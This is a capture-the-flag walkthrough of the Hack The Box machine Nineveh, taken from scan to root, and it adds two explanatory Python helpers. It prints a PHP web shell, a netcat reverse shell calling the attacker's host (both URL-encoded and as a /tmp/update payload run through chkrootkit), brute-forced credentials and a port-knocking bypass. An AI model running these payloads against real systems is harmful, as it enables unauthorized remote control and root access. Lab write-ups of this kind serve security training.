As always, we start with an nmap. This machine was very interesting because it combined a lot of vulnerabilities and odd configurations such as port knocking.

root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 11:00 CET
Nmap scan report for 10.10.10.43
Host is up (0.018s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).

With dirb and hydra we discovered:

http://10.10.10.43/department/login.php
admin:1q2w3e4r5t
https://10.10.10.43/db/
password123
https://10.10.10.43/secure_notes/

Secure notes has an image with steganography.

root@Kali2:~/Desktop# binwalk -h

Binwalk v2.1.2
Craig Heffner, ReFirmLabs

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

Extraction Options:
    -e, --extract                 Automatically extract known file types
    -D, --dd=<type:ext:cmd>       Extract <type> signatures, give the files an extension of <ext>, and execute <cmd>
    -M, --matryoshka              Recursively scan extracted files
    -d, --depth=<int>             Limit matryoshka recursion depth (default: 8 levels deep)
    -C, --directory=<str>         Extract files/folders to a custom directory (default:

root@Kali2:~/Desktop# binwalk -Me nineveh.png

Scan Time:     2019-10-29 11:17:44
Target File:   /root/Desktop/nineveh.png
MD5 Checksum:  353b8f5a4578e4472c686b6e1f15c808
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)


Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/54
MD5 Checksum:  d41d8cd98f00b204e9800998ecf8427e
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------


Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum:  6b60618d207ad97e76664174e805cfda
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             OpenSSH RSA public key


Scan Time:     2019-10-29 11:17:45
Target File:   /root/Desktop/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum:  f426d661f94b16292efc810ebb7ea305
Signatures:    386

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PEM RSA private key

Inside there is a private and a public key, but for now we don't know where to use them.

https://10.10.10.43/db/ is running phpLiteAdmin, which has a vulnerability that lets us write PHP into a database file saved under a .php name. Together with the file inclusion in manage.php, this gives PHP execution:

<?php echo system($_REQUEST["cmd"]); ?>

And then by browsing to

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

SQLite format 3@  -�
��S�tableaaCREATE TABLE 'a' ('css
files
footer.php
header.php
index.php
login.php
logout.php
manage.php
underconstruction.jpg
underconstruction.jpg' INTEGER)

For a reverse shell:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1234+>/tmp/f

Once on the machine, we drop in our cronchecker:

--2019-10-29 07:38:08--  http://10.10.14.4:8000/cronchecker.sh
Connecting to 10.10.14.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338 [text/x-sh]
Saving to: 'cronchecker.sh'

cronchecker.sh      100%[===================>]     338  --.-KB/s    in 0s      

2019-10-29 07:38:08 (69.9 MB/s) - 'cronchecker.sh' saved [338/338]

www-data@nineveh:/dev/shm$ chmod +x cronchecker.sh
www-data@nineveh:/dev/shm$ bash cronchecker.sh
< root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:12 /usr/sbin/knockd -d -i ens33
> root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:13 /usr/sbin/knockd -d -i ens33
< root       598  0.0  0.0      0     0 ?        S    07:18   0:00  \_ [kworker/0:6]
< www-data 13017  0.0  0.9 270468  9748 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
> www-data 13017  0.0  1.5 270920 15324 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
> root     21131  0.0  0.2  50224  2932 ?        S    07:39   0:00  \_ /usr/sbin/CRON -f
> root     21132  0.0  0.0   4512   804 ?        Ss   07:39   0:00      \_ /bin/sh -c /root/vulnScan.sh
> root     21134  0.0  0.2  12516  3016 ?        S    07:39   0:00          \_ /bin/bash /root/vulnScan.sh
> root     21136  1.0  0.2   4796  2072 ?        S    07:39   0:00              \_ /bin/sh /usr/bin/chkrootkit
> root     21610  0.0  0.0   4796   432 ?        S    07:39   0:00                  \_ /bin/sh /usr/bin/chkrootkit
> root     21611  0.0  0.1  28920  1556 ?        R    07:39   0:00                      \_ /bin/ps ax
> root     21612  0.0  0.0  14228  1016 ?        S    07:39   0:00                      \_ grep -E (^|[^A-Za-z0-9_])sshd([^A-Za-z0-9_]|$)
> root     21613  0.0  0.1  14228  1020 ?        S    07:39   0:00                      \_ grep -E -v grep
> root     21614  0.0  0.0  14228   936 ?        S    07:39   0:00                      \_ grep -E -v chkrootkit
> root     21615  0.0  0.0   4796   436 ?        S    07:39   0:00                      \_ /bin/sh /usr/bin/chkrootkit
> root     21616  0.0  0.1  24760  1420 ?        S    07:39   0:00                      \_ /usr/bin/awk { print $5 }

We discover two interesting things.

  1. chkrootkit (vulnerable)
  2. knockd (port knocking)
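The page does not show what cronchecker.sh contains, only its output, so here is an added example (my own, not the author's script) of the idea behind it: take two process snapshots a little apart, diff them by PID, and report the commands that appeared and run as root. The two listings below are constructed from the ps lines shown above, and the column layout assumed is the standard `ps aux` one with the `ps axf` tree prefix on the command.

```python
"""
Process-snapshot differ: spot root jobs that a scheduler runs between two
`ps` listings.  Added example for this writeup, not the author's
cronchecker.sh.  Both snapshots are constructed from the ps output shown
on the page.
"""

PS_FIELDS = ("user", "pid", "cpu", "mem", "vsz", "rss", "tty", "stat", "start", "time")

# Constructed: processes before the cron minute ticked over.
PS_BEFORE = r"""
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:12 /usr/sbin/knockd -d -i ens33
root       598  0.0  0.0      0     0 ?        S    07:18   0:00  \_ [kworker/0:6]
www-data 13017  0.0  0.9 270468  9748 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
"""

# Constructed: processes a moment later, while cron runs /root/vulnScan.sh.
PS_AFTER = r"""
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:13 /usr/sbin/knockd -d -i ens33
www-data 13017  0.0  1.5 270920 15324 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
root     21131  0.0  0.2  50224  2932 ?        S    07:39   0:00  \_ /usr/sbin/CRON -f
root     21132  0.0  0.0   4512   804 ?        Ss   07:39   0:00      \_ /bin/sh -c /root/vulnScan.sh
root     21134  0.0  0.2  12516  3016 ?        S    07:39   0:00          \_ /bin/bash /root/vulnScan.sh
root     21136  1.0  0.2   4796  2072 ?        S    07:39   0:00              \_ /bin/sh /usr/bin/chkrootkit
"""


def parse_ps_line(line):
    """Split one `ps aux`-style line into a dict; returns None for unparseable lines."""
    parts = line.split(None, len(PS_FIELDS))
    if len(parts) != len(PS_FIELDS) + 1:
        return None
    rec = dict(zip(PS_FIELDS, parts[:-1]))
    rec["command"] = parts[-1].lstrip(" \\_")   # drop the `ps axf` tree drawing
    try:
        rec["pid"] = int(rec["pid"])
    except ValueError:
        return None
    return rec


def snapshot(text):
    """{pid: record} for every parseable line, ignoring the header."""
    procs = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("USER"):
            continue
        rec = parse_ps_line(line)
        if rec:
            procs[rec["pid"]] = rec
    return procs


def new_processes(before, after):
    """Records present in `after` but not in `before`, ordered by PID."""
    return [after[pid] for pid in sorted(set(after) - set(before))]


def root_jobs(before, after):
    """Commands that appeared between the snapshots and run as root.
    Kernel threads (bracketed names) and the cron daemon itself are skipped,
    which leaves the scheduled script and whatever it launches."""
    jobs = []
    for rec in new_processes(before, after):
        cmd = rec["command"]
        if rec["user"] != "root" or cmd.startswith("[") or "CRON" in cmd:
            continue
        jobs.append(cmd)
    return jobs


if __name__ == "__main__":
    for cmd in root_jobs(snapshot(PS_BEFORE), snapshot(PS_AFTER)):
        print("new root job:", cmd)
```

On the real box the two listings would come from running `ps auxf` twice in a loop; the point of diffing rather than reading one listing is that short-lived jobs like the chkrootkit run only exist for a few seconds each minute.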

LinEnum shows that SSH is listening on port 22 on the box, even though it looked filtered from outside (wtf), and knockd again:

[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1037528 Jun 24  2016 /bin/bash
lrwxrwxrwx 1 root root        4 Jul  2  2017 /bin/sh -> dash
...
-rwxr-xr-x 1 root root    48080 Mar 25  2009 /usr/sbin/knockd
…
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN

To check knockd we can go to the config file:

www-data@nineveh:/dev/shm$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens33

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

To open the port we need to “knock” on 571, 290 and 911, in that order:

root@Kali2:~/Desktop# for x in 571 290 911; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.43; done
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.15 seconds
root@Kali2:~/Desktop# nmap -p 22 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Nmap scan report for 10.10.10.43
Host is up (0.020s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
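To make the config above and the nmap loop easier to reason about, here is an added example (mine, not part of knockd or of the original writeup) that parses a knockd.conf and replays a list of SYN arrivals against it the way a simplified knockd matcher would: the first port of the sequence starts a timer, every later SYN must hit the next expected port, and the whole thing has to finish within seq_timeout seconds or the attempt is forgotten. The config string is a copy of the one on the page; the timestamps fed to it are constructed, and the matcher is a model of knockd's behaviour rather than its code.

```python
"""
Parse knockd.conf and model its sequence matcher.  Added example for this
writeup; not knockd's own code.  KNOCKD_CONF is a copy of the config shown
on the page, the SYN timings are constructed.
"""
import re
from dataclasses import dataclass

KNOCKD_CONF = """\
[options]
 logfile = /var/log/knockd.log
 interface = ens33

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn
"""


@dataclass
class Knock:
    name: str
    sequence: list
    seq_timeout: int
    start_command: str
    tcpflags: str

    def dport(self):
        """Port named by --dport in start_command (None if there is none)."""
        m = re.search(r"--dport\s+(\d+)", self.start_command)
        return int(m.group(1)) if m else None


def parse_knockd_conf(text):
    """Return {section: Knock} for every section other than [options]."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    knocks = {}
    for name, kv in sections.items():
        if name == "options":
            continue
        knocks[name] = Knock(
            name=name,
            sequence=[int(p) for p in re.split(r"[,\s]+", kv["sequence"]) if p],
            seq_timeout=int(kv.get("seq_timeout", "5")),
            start_command=kv.get("start_command", ""),
            tcpflags=kv.get("tcpflags", "syn"),
        )
    return knocks


def match_sequence(knock, syns):
    """
    Simplified model of knockd's matcher.  `syns` is a list of
    (timestamp_seconds, dst_port) SYNs from one source IP, in arrival order.
    Returns the timestamp at which the sequence completed (when start_command
    would fire), or None if it never did.
    """
    idx, started = 0, None
    for ts, port in syns:
        if started is not None and ts - started > knock.seq_timeout:
            idx, started = 0, None          # too slow: forget the partial knock
        if port == knock.sequence[idx]:
            if idx == 0:
                started = ts                # first port starts the timer
            idx += 1
            if idx == len(knock.sequence):
                return ts                   # full sequence within the window
        else:
            idx, started = 0, None          # wrong port: reset ...
            if port == knock.sequence[0]:
                idx, started = 1, ts        # ... but it may begin a fresh attempt


if __name__ == "__main__":
    knocks = parse_knockd_conf(KNOCKD_CONF)
    for k in knocks.values():
        print(f"{k.name}: {k.sequence} within {k.seq_timeout}s -> port {k.dport()}")
    # Constructed timings for the three nmap probes shown above, ~1 s apart.
    print(match_sequence(knocks["openSSH"], [(0.0, 571), (1.1, 290), (2.3, 911)]))
```

Two things the replay makes obvious: the same three ports in the reverse order are the closeSSH sequence, so nothing fires for openSSH if the loop is written backwards, and a pause longer than seq_timeout between two probes (a slow nmap with retries, for instance) silently resets the attempt, which is why the loop above uses --max-retries 0 and a short host timeout.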

Once it is open we can log in via SSH with the key extracted from the image.

Now let's look at chkrootkit.

root@Kali2:~/Desktop# searchsploit chkrootkit
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                                                                                                                      | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                                                                                                              | exploits/linux/local/33899.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@Kali2:~/Desktop# searchsploit -x 33899

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

searchsploit tells us that placing a file at /tmp/update gets it executed as root. So we create a file “update”:

#!/bin/sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f

And it calls home 🙂

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.43] 39640
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python3 -c 'import pty;pty.spawn("/bin/bash");'
root@nineveh:~# ^Z
[1]+  Stopped                 nc -nlvp 1234
root@Kali2:~/Desktop# stty raw -echo
root@Kali2:~/Desktop# nc -nlvp 1234

root@nineveh:~# cd /
root@nineveh:/# cd root/
root@nineveh:~# cat root.txt
8a2b49...